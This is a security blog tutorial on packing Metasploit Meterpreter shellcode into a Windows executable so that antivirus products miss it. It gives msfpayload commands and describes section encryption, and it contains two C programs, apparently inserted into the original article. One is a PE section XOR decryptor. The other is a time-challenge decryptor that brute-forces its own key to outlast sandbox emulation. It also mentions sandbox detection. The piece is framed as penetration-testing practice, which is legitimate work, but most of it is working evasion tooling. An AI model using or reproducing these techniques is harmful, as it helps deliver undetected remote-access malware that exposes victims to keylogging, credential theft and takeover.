Hide meterpreter shellcode in executable

Have you ever wanted to put Meterpreter in an .exe file but were annoyed by antivirus detecting it? Here is a way to bypass AV detection by applying the method described in the "Code segment encryption" article.

Article published on 11 March 2014
last modification on 29 May 2016

by Emeric Nasi

Note: To understand this document it is important to first understand the code segment encryption article.
License : Copyright Emeric Nasi, some rights reserved
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.

I. Introduction.

As a security professional, I often have to audit the security of a system and demonstrate what malware could do. A very simple way to do that is to use Metasploit's Meterpreter. For those who don't know Meterpreter (the Meta-Interpreter), it is a very advanced payload provided by the Metasploit framework. It provides all the features one needs to own a system (privilege escalation, system shell, keylogger, password dumping, network routing, disabling AV, webcam control, etc.).
I often need to generate an autonomous executable that includes this payload. The problem is that the classical way to generate a Meterpreter executable is detected by antivirus software, and it is a pain (and not really realistic) to have to disable it. This article describes a way to bypass AV detection of Meterpreter by applying the technique from the "Code segment encryption" article.

Note: I will demonstrate the examples in this article with the simple Meterpreter bind_tcp shellcode (it opens a listening TCP socket on the host and waits for a connection from the Metasploit client). Any other shellcode could be used.

II. Classic way to generate Meterpreter executable

II.1 Generate binary

Normally the classic way to generate a Meterpreter executable is to use the tools provided by Metasploit. The msfpayload tool can be used for that. For example:
msfpayload windows/meterpreter/bind_tcp LPORT=80 X > met.exe
Here the X option tells msfpayload to output a Windows executable.

msfpayload can also be piped into msfencode to produce an encoded shellcode (here 21 encoding iterations, written out as an .exe). For example:
msfpayload windows/meterpreter/bind_tcp LPORT=80 R | ./msfencode -c 21 -t exe > met.exe

II.2 Drawbacks

This msfencode technique is often presented as a way to bypass antivirus analysis; that is not true anymore. Many antivirus products are able to recognize encoded Metasploit shellcode (the encoders were made to avoid bad characters in a payload, not to defeat signature scanning). Some antivirus vendors may also have generated signatures for the executable template that the X option of msfpayload wraps the payload in (this is just a supposition though).
Another reason why I do not like this method: I prefer to have non-encoded stagers. When I use reverse-connection payloads, I want to be able to patch the remote IP address and port of the shellcode dynamically in the running executable, which is not easy if the shellcode is encoded.
For these reasons I prefer to build my own executable file which embeds the shellcode.

III. Put Meterpreter shellcode in C source

III.1 Generate shellcode

In a first step we are going to generate the Meterpreter shellcode. We are going to use the C option of MsfPayload which generates C source code.

msfpayload windows/meterpreter/bind_tcp LPORT=80 C > met.c

If you look inside met.c you will see the shellcode as C byte arrays. The stager is the first one (the small one); it is the part that creates the network connection. The full Meterpreter stage is downloaded over that connection once it is established. We copy the stager into our source.

III.2 Source code

In this very basic example, we cast the shellcode buffer to a function pointer and call it.

We now have our own executable running Meterpreter. This is however not enough to bypass AV: the shellcode is easily recognized in the generated binary. This is why we use the section encryption technique explained in the code segment encryption article.

IV. Bypass AV

We are going to encrypt both the executable code (what is in main function) and the data (the shellcode).

IV.1 Encrypt source code

Compiled code normally lives in the .text section. Since encrypting the whole .text section is itself treated as a malware indicator by some AV, I encrypt only the code needed to launch the shellcode, by placing it in a new code section, .code.

Note that the old main function is now called shellLaunch. Since only part of .text is encrypted, we can define a new main function that contains the decryptor.

IV.2 Encrypt shellcode

The shellcode is an array, so it will be placed in the .data section. Since we only want to encrypt a portion of .data, we create a new data section for it (.codedata) and merge .codedata into .code, the section encrypted by the cryptor from the code segment encryption article.

I also use .codedata as the constant section, which lets you encrypt any strings you want to print.

IV.3 Complete source code including decryptor

Here is the complete C source code, including the .Stub segment and the decryptor routine.
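The decryptor side of sections IV.1 to IV.3, as an added example rather than the article's own listing (which is not reproduced on this page). The build side is MSVC section pragmas, shown in the header comment; the run-time side is a routine that locates .code through the PE section table of the loaded image and XORs it back in place, exercised on a constructed minimal PE image so it runs on any platform. The cipher (single-byte XOR), the key 0x5A, the test image layout and the function names are this example's assumptions, not the article's.

```c
/* Added example, not the article's listing: the run-time half of IV.1-IV.3.
 * With MSVC the build side is a matter of pragmas: everything after
 *   #pragma section(".code", execute, read, write) / #pragma code_seg(".code")
 * (shellLaunch, the former main) and after #pragma data_seg(".codedata") /
 * #pragma const_seg(".codedata") (the shellcode array and strings) ends up
 * in .code once the linker merges the two (/MERGE:.codedata=.code); a
 * cryptor then encrypts .code in the built file. The new main() runs the
 * decryptor below: find .code through the PE section table of the loaded
 * image (GetModuleHandle(NULL) on Windows), XOR it back in place, then call
 * shellLaunch(). It works on a plain byte buffer, so here it is exercised on
 * a constructed minimal PE image. Single-byte XOR stands in for the cipher. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SEC_HDR 40                 /* sizeof(IMAGE_SECTION_HEADER) */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Walk the section table of a mapped PE image and return the RVA and
 * VirtualSize of the section named `name`. 0 on success, -1 otherwise. */
int find_section(const uint8_t *img, size_t len, const char *name,
                 uint32_t *rva, uint32_t *size)
{
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return -1;
    uint32_t nt = rd32(img + 0x3C);                      /* e_lfanew */
    if ((size_t)nt + 24 > len || memcmp(img + nt, "PE\0\0", 4) != 0) return -1;
    uint16_t nsec = rd16(img + nt + 6);                  /* NumberOfSections */
    size_t sh = (size_t)nt + 24 + rd16(img + nt + 20);   /* + SizeOfOptionalHeader */
    char want[8] = {0};                                  /* names are 8 bytes, not NUL-terminated */
    memcpy(want, name, strlen(name) < 8 ? strlen(name) : 8);
    for (uint16_t i = 0; i < nsec; i++, sh += SEC_HDR) {
        if (sh + SEC_HDR > len) return -1;
        if (memcmp(img + sh, want, 8) == 0) {
            *size = rd32(img + sh + 8);                  /* VirtualSize */
            *rva  = rd32(img + sh + 12);                 /* VirtualAddress */
            return 0;
        }
    }
    return -1;
}

/* The decryptor proper: XOR the named section in place. XOR is symmetric, so
 * the post-build cryptor is the same loop. In the real launcher the pages of
 * .code must be writable when this runs (hence `write` in #pragma section
 * above, or a VirtualProtect call). Returns bytes processed, or -1. */
long decrypt_section(uint8_t *img, size_t len, const char *name, uint8_t key)
{
    uint32_t rva, size;
    if (find_section(img, len, name, &rva, &size) != 0) return -1;
    if ((size_t)rva + size > len) return -1;
    for (uint32_t i = 0; i < size; i++) img[rva + i] ^= key;
    return (long)size;
}

/* Constructed test image: DOS header, PE signature, file header announcing two
 * sections and a PE32+-sized (zeroed) optional header, the .text and .code
 * section headers, and the .code body at CODE_RVA already encrypted. */
#define IMG_LEN  0x400
#define CODE_RVA 0x300
void build_fake_image(uint8_t *img, const uint8_t *plain, uint32_t plen, uint8_t key)
{
    memset(img, 0, IMG_LEN);
    img[0] = 'M'; img[1] = 'Z';
    uint32_t nt = 0x40;
    wr32(img + 0x3C, nt);
    memcpy(img + nt, "PE\0\0", 4);
    wr16(img + nt + 4, 0x8664);                          /* Machine: AMD64 */
    wr16(img + nt + 6, 2);                               /* NumberOfSections */
    wr16(img + nt + 20, 0xF0);                           /* SizeOfOptionalHeader (PE32+) */
    size_t sh = nt + 24 + 0xF0;
    memcpy(img + sh, ".text\0\0\0", 8);
    wr32(img + sh + 8, 0x40); wr32(img + sh + 12, 0x200);
    sh += SEC_HDR;
    memcpy(img + sh, ".code\0\0\0", 8);
    wr32(img + sh + 8, plen); wr32(img + sh + 12, CODE_RVA);
    for (uint32_t i = 0; i < plen; i++) img[CODE_RVA + i] = plain[i] ^ key;
}

/* End to end: the image ships encrypted, the decryptor restores it. 1 if ok. */
int self_test(void)
{
    static const uint8_t plain[] = "shellLaunch + stager + strings";  /* constructed .code contents */
    uint8_t img[IMG_LEN];
    build_fake_image(img, plain, sizeof plain, 0x5A);
    if (memcmp(img + CODE_RVA, plain, sizeof plain) == 0) return 0;   /* must not be in clear at rest */
    if (decrypt_section(img, IMG_LEN, ".code", 0x5A) != (long)sizeof plain) return 0;
    return memcmp(img + CODE_RVA, plain, sizeof plain) == 0;
}

int main(void)
{
    int ok = self_test();
    printf("decryptor self-test: %s\n", ok ? "ok" : "FAILED");
    return ok ? 0 : 1;
}
```

On Windows, `img` is the module base returned by GetModuleHandle(NULL) and `len` its SizeOfImage. Nothing that executes before the XOR loop, in particular main() and the decryptor itself, may live in .code, which is why they sit outside it (in .text or a .Stub section); and a cryptor that encrypts the built file must use the section's raw-data offset, whereas the decryptor above uses the RVA of the mapped image.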

IV.4 Other considerations

This encryption is enough to bypass AVs such as Avira, McAfee, Norton or Avast.
It is however not enough to bypass antivirus products that load the program into memory, such as Microsoft Defender. This kind of AV runs its target in a virtual environment, which means the code decrypts itself, after which the AV recognizes the shellcode signature. This was actually quite surprising for me to see: in this case at least, Microsoft had the "better" security product.
There are ways to bypass this category of AV, for example by using a decryptor that takes some time to finish. If the decryptor is written so that a few seconds must pass before the shellcode is decrypted, the AV gives up the scan after a while. There are several ways to do this, for example a time-challenge decryption algorithm. A simple Sleep will not do the trick; it is ignored by the AV.
Another way to bypass this kind of AV is to detect that the program is running in a sandbox and to behave differently, tricking the AV, when it is.
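One reading of the "time challenge decryption" idea above, as an added example that is neither the article's code nor the method of the paper it mentions: the binary does not store the decryption key at all, only a check value derived from it, so the decryptor has to search the key space before it can decrypt the stager. A sandbox that emulates the program for a bounded time never reaches the plaintext, and unlike a Sleep() the loop cannot be skipped without doing the work. The check function (MurmurHash3's fmix32), the key width, the XOR cipher and the names are this example's assumptions.

```c
/* Added example, not the article's code: a "time challenge" decryptor. The
 * key is never shipped, only key_check(key); main() must brute-force the key
 * before it can decrypt, which costs an emulator real CPU time. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Check value: MurmurHash3's fmix32. It is a permutation of 32-bit values, so
 * a check has exactly one preimage and the search can stop at the first hit.
 * It is not one-way against an analyst (every step is invertible); the point
 * is only that the emulator has to spend the loop's work. */
uint32_t key_check(uint32_t k)
{
    k ^= k >> 16; k *= 0x85EBCA6Bu;
    k ^= k >> 13; k *= 0xC2B2AE35u;
    k ^= k >> 16;
    return k;
}

/* Exhaustive search over a `bits`-wide key space. Work doubles per bit: size
 * `bits` so this takes a few seconds on the target, not milliseconds.
 * Returns 1 and sets *key on success, 0 if no key in range matches. */
int recover_key(uint32_t check, unsigned bits, uint32_t *key)
{
    uint64_t limit = (uint64_t)1 << bits;
    for (uint64_t k = 0; k < limit; k++)
        if (key_check((uint32_t)k) == check) { *key = (uint32_t)k; return 1; }
    return 0;
}

/* Repeating 4-byte XOR as a stand-in for the cryptor's cipher (symmetric). */
void xor_with_key(uint8_t *buf, size_t len, uint32_t key)
{
    for (size_t i = 0; i < len; i++) buf[i] ^= (uint8_t)(key >> (8 * (i % 4)));
}

/* Build-time side, inlined so the example is self-contained. The key is used
 * only here; what ships is the encrypted blob and the check value. */
#define DEMO_BITS 18                     /* 2^18 candidates: instant; real use goes higher */
#define DEMO_KEY  0x0002C3A7u            /* any value below 2^DEMO_BITS */

/* Run-time side: recover the key from the check value, then decrypt.
 * Returns 1 if the recovered plaintext matches what was encrypted. */
int self_test(void)
{
    const uint8_t stager[] = "stand-in for the stager bytes";    /* constructed */
    uint8_t blob[sizeof stager];
    memcpy(blob, stager, sizeof blob);
    xor_with_key(blob, sizeof blob, DEMO_KEY);                    /* what the binary carries */
    uint32_t check = key_check(DEMO_KEY);                         /* the only key material kept */

    uint32_t k;
    if (!recover_key(check, DEMO_BITS, &k)) return 0;
    xor_with_key(blob, sizeof blob, k);
    return memcmp(blob, stager, sizeof blob) == 0;
}

int main(void)
{
    int ok = self_test();
    printf("time-challenge decryptor: %s\n", ok ? "ok" : "FAILED");
    return ok ? 0 : 1;
}
```

The delay scales with the key width, so the same code serves a two-second and a twenty-second challenge by changing DEMO_BITS; the cost is paid once per launch, which is acceptable for a payload that is started once and then lives in memory.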

I wrote a paper on this subject describing fully undetectable methods. You can find it here.